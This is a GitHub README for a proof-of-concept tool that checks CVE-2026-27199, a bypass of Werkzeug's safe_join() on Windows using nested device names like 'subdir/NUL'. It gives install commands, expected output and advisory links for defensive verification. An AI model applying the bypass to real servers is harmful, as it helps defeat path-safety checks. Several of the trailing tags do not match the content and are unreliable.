alimezar/CVE-2026-27199-werkzeug-safe-join-bypass-PoC

GitHub: alimezar/CVE-2026-27199-werkzeug-safe-join-bypass-PoC

Proof-of-concept tool for the nested device-name bypass in Werkzeug's safe_join() function on Windows

Stars: 0 | Forks: 0

# CVE-2026-27199 PoC: Werkzeug `safe_join()` Windows device-name bypass

## Affected versions

| Package | Affected versions | Fixed version |
|----------|-------------------|---------------|
| werkzeug | `< 3.1.6`         | `3.1.6`       |

## Proof of concept

```
pip install "werkzeug==3.1.5"
python poc_CVE-2026-27199.py
```

### Expected output (affected version)

```
============================================================
CVE-2026-27199 — Werkzeug safe_join() PoC
============================================================
[*] Werkzeug version : 3.1.5
[*] os.name : nt
[+] safe_join(base, 'NUL') -> None (correctly blocked)
[!] safe_join(base, 'subdir/NUL') -> C:\...\subdir\NUL (bypass!)
[*] Attempting to write to the returned path ...
[!] open(nested NUL) write: SUCCESS — data silently discarded by device
[!] VULNERABLE: CVE-2026-27199 confirmed on this installation.
    Upgrade to werkzeug >= 3.1.6 to remediate.
```

### Expected output (fixed version)

```
[+] safe_join(base, 'subdir/NUL') -> None (correctly blocked)
[+] NOT VULNERABLE: nested device name was blocked.
```

## References

- [GHSA-29vq-49wr-vm6x](https://github.com/advisories/GHSA-29vq-49wr-vm6x) — this advisory
- [GHSA-hgf8-39gv-g3f2](https://github.com/advisories/GHSA-hgf8-39gv-g3f2) — earlier related advisory
- [GHSA-87hc-h4r5-73f7](https://github.com/advisories/GHSA-87hc-h4r5-73f7) — earlier related advisory
- [Werkzeug changelog](https://werkzeug.palletsprojects.com/en/stable/changes/)

*This PoC follows the principles of responsible disclosure and public patch release, and is intended for educational and defensive purposes only.*
Tags: CVE-2026-27199, Flask, Maven, NTFS quirks, PoC, safe_join bypass, Werkzeug, Windows device names, middleware security, arbitrary file write, security testing, offensive security, brute force, vulnerability verification, network reconnaissance, network security auditing, path traversal, reverse-engineering tools